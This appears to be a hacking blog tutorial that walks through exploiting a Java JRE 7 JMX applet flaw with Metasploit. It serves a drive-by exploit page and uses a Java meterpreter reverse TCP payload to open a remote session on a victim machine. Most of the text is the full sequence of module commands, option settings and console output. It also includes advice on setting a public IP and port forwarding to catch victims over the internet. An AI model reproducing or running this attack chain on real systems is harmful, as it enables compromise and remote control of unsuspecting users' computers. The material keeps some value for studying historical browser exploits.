Java Applet JMX Remote Code Execution

Java exploits are client side exploits that mostly target browsers to run arbitrary command on the system. These exploits are put up on a webpage in the form of a java applet. When a victim visits the url and allows the applet to run, the java runtime or JRE is exploited to execute arbitrary command on the system and get control.
The “JMX Remote Code Execution” exploit is a recent one that has been exploited a lot in Feb 2013. It exploits the jmx classes in a java applet. The vulnerability is present in Sun Java JRE 7 till update 11. This is a generic jre exploit, which means that it would be able to exploit any os, any browser that is running the vulnerable jre version.
A POC code of the exploit has been posted here.
Exploit with metasploit
Search for the java exploit.
msf > search exploit java multi browser Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/multi/browser/firefox_escape_retval 2009-07-13 00:00:00 UTC normal Firefox 3.5 escape() Return Value Memory Corruption exploit/multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 00:00:00 UTC excellent Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution exploit/multi/browser/java_atomicreferencearray 2012-02-14 00:00:00 UTC excellent Java AtomicReferenceArray Type Violation Vulnerability exploit/multi/browser/java_calendar_deserialize 2008-12-03 00:00:00 UTC excellent Sun Java Calendar Deserialization Privilege Escalation exploit/multi/browser/java_getsoundbank_bof 2009-11-04 00:00:00 UTC great Sun Java JRE getSoundbank file:// URI Buffer Overflow exploit/multi/browser/java_jre17_exec 2012-08-26 00:00:00 UTC excellent Java 7 Applet Remote Code Execution exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl 2012-10-16 00:00:00 UTC excellent Java Applet AverageRangeStatisticImpl Remote Code Execution exploit/multi/browser/java_jre17_jaxws 2012-10-16 00:00:00 UTC excellent Java Applet JAX-WS Remote Code Execution exploit/multi/browser/java_jre17_jmxbean 2013-01-10 00:00:00 UTC excellent Java Applet JMX Remote Code Execution exploit/multi/browser/java_jre17_jmxbean_2 2013-01-19 00:00:00 UTC excellent Java Applet JMX Remote Code Execution exploit/multi/browser/java_jre17_method_handle 2012-10-16 00:00:00 UTC excellent Java Applet Method Handle Remote Code Execution exploit/multi/browser/java_rhino 2011-10-18 00:00:00 UTC excellent Java Applet Rhino Script Engine Remote Code Execution exploit/multi/browser/java_rmi_connection_impl 2010-03-31 00:00:00 UTC excellent Java RMIConnectionImpl Deserialization Privilege Escalation exploit/multi/browser/java_setdifficm_bof 2009-11-04 00:00:00 UTC great Sun Java JRE AWT setDiffICM Buffer Overflow exploit/multi/browser/java_signed_applet 1997-02-19 00:00:00 UTC excellent Java Signed Applet Social Engineering Code Execution exploit/multi/browser/java_trusted_chain 2010-03-31 00:00:00 UTC excellent Java Statement.invoke() Trusted Method Chain Privilege Escalation exploit/multi/browser/java_verifier_field_access 2012-06-06 00:00:00 UTC excellent Java Applet Field Bytecode Verifier Cache Remote Code Execution exploit/multi/browser/mozilla_navigatorjava 2006-07-25 00:00:00 UTC normal Mozilla Suite/Firefox Navigator Object Code Execution exploit/multi/browser/qtjava_pointer 2007-04-23 00:00:00 UTC excellent Apple QTJava toQTPointer() Arbitrary Memory Access exploit/multi/misc/batik_svg_java 2012-05-11 00:00:00 UTC excellent Squiggle 1.7 SVG Browser Java Code Execution exploit/windows/browser/imgeviewer_tifmergemultifiles 2010-03-03 00:00:00 UTC normal Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control exploit/windows/browser/java_docbase_bof 2010-10-12 00:00:00 UTC great Sun Java Runtime New Plugin docbase Buffer Overflow exploit/windows/browser/ms05_054_onload 2005-11-21 00:00:00 UTC normal MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution exploit/windows/browser/teechart_pro 2011-08-11 00:00:00 UTC normal TeeChart Professional ActiveX Control <= 2010.0.0.3 Trusted Integer Dereference
The exploit is this one
exploit/multi/browser/java_jre17_jmxbean_2
Use the info command to get the description
This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February of 2013. Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user.
Setup a vulnerable system
To test out this exploit we need a vulnerable system. For this I have setup windows xp with sun java jre-7u10. Thats java runtime version 7 update 10. Note that this exploit will not work on java version 6. It works only on version 7 till update 11. The jre installation file name is “jre-7u10-windows-i586.exe”. Download it from somewhere and install.
And for the browser, any browser should work fine.
Select exploit
msf > use exploit/multi/browser/java_jre17_jmxbean_2
Check the options
msf exploit(java_jre17_jmxbean_2) > show options Module options (exploit/multi/browser/java_jre17_jmxbean_2): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 0 Generic (Java Payload) msf exploit(java_jre17_jmxbean_2) >
The srvhost and srvport are the host and port on which a web server will be run to serve the exploit webpage with the applet. Ideally the port number should be 80 so that the port number need not be mentioned in the url. But in this case we shall use 8080. The SRVHOST can be left 0.0.0.0 which means local system. Set the URIPATH to / so that the url is small.
msf exploit(java_jre17_jmxbean_2) > set URIPATH /
Select payload
Next check the payloads compatible with this exploit.
msf exploit(java_jre17_jmxbean_2) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- generic/custom normal Custom Payload generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP Stager java/meterpreter/reverse_http normal Java Meterpreter, Java Reverse HTTP Stager java/meterpreter/reverse_https normal Java Meterpreter, Java Reverse HTTPS Stager java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP Stager java/shell/bind_tcp normal Command Shell, Java Bind TCP Stager java/shell/reverse_tcp normal Command Shell, Java Reverse TCP Stager java/shell_reverse_tcp normal Java Command Shell, Reverse TCP Inline msf exploit(java_jre17_jmxbean_2) >
We are going to use java/meterpreter/reverse_tcp
msf exploit(java_jre17_jmxbean_2) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(java_jre17_jmxbean_2) >
Check the options once again.
msf exploit(java_jre17_jmxbean_2) > show options Module options (exploit/multi/browser/java_jre17_jmxbean_2): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Payload options (java/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Generic (Java Payload) msf exploit(java_jre17_jmxbean_2) >
Now the payload options are visible in the options lists. The LHOST and LPORT are the host and port on which the reverse shell handler will listen. The important thing to note over here is that the LHOST and LPORT should be reachable by the victim machine. When on a local network, the LHOST can be set to your LAN ip (for example 192.168.1.33). However when over the internet, the victim machine connects to you through your public internet ip. In that case the LHOST should be your public internet IP address. And if your machine (hacker machine) is behind a router that port forwarding must be setup properly for LPORT, so that incoming connections are send to LPORT.
msf exploit(java_jre17_jmxbean_2) > set LHOST 192.168.1.33 LHOST => 192.168.1.33 msf exploit(java_jre17_jmxbean_2) > set LPORT 5555 LPORT => 5555 msf exploit(java_jre17_jmxbean_2) >
Now that we have setup our options correctly, its time to run the exploit.
msf exploit(java_jre17_jmxbean_2) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.33:5555 [*] Using URL: http://0.0.0.0:8080/ msf exploit(java_jre17_jmxbean_2) > [*] Local IP: http://192.168.1.33:8080/ [*] Server started.
Metasploit informs us that the reverse shell handler has been started, and the server to serve the java exploit page has also been started. The victim now has to access the url “http://192.168.1.33:8080/” in order to run the java exploit. Once the java applet is loaded and run the exploit will run and metasploit will get a meterpreter session.
So go to your vulnerable machine setup and open the url in a browser.
Meterpreter
Once the url is opened, metasploit will start sending the exploit payloads etc and if everything goes fine, the meterpreter sessions should start.
msf exploit(java_jre17_jmxbean_2) > [*] 192.168.1.4 java_jre17_jmxbean_2 - handling request for / [*] 192.168.1.4 java_jre17_jmxbean_2 - Sending HTML [*] 192.168.1.4 java_jre17_jmxbean_2 - handling request for /favicon.ico [*] 192.168.1.4 java_jre17_jmxbean_2 - handling request for /lEUioG.jar [*] 192.168.1.4 java_jre17_jmxbean_2 - Sending JAR [*] 192.168.1.4 java_jre17_jmxbean_2 - handling request for /lEUioG.jar [*] 192.168.1.4 java_jre17_jmxbean_2 - Sending JAR [*] 192.168.1.4 java_jre17_jmxbean_2 - handling request for /java/lang/ClassBeanInfo.class [*] 192.168.1.4 java_jre17_jmxbean_2 - handling request for /java/lang/ObjectBeanInfo.class [*] 192.168.1.4 java_jre17_jmxbean_2 - handling request for /java/lang/ObjectCustomizer.class [*] 192.168.1.4 java_jre17_jmxbean_2 - handling request for /java/lang/ClassCustomizer.class [*] Sending stage (30246 bytes) to 192.168.1.4 [*] Meterpreter session 1 opened (192.168.1.33:5555 -> 192.168.1.4:1065) at 2013-05-16 23:01:46 -0700
So meterpreter session started successfully.
msf exploit(java_jre17_jmxbean_2) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter java/java enlightened @ ---------- 192.168.1.33:5555 -> 192.168.1.4:1065 (192.168.1.4) msf exploit(java_jre17_jmxbean_2) > session -i 1 [-] Unknown command: session. msf exploit(java_jre17_jmxbean_2) > sessions -i 1 [*] Starting interaction with 1... meterpreter > pwd C:Program FilesGoogleChromeApplication26.0.1410.64
We have successfully hacked the victim machine. Play with it!!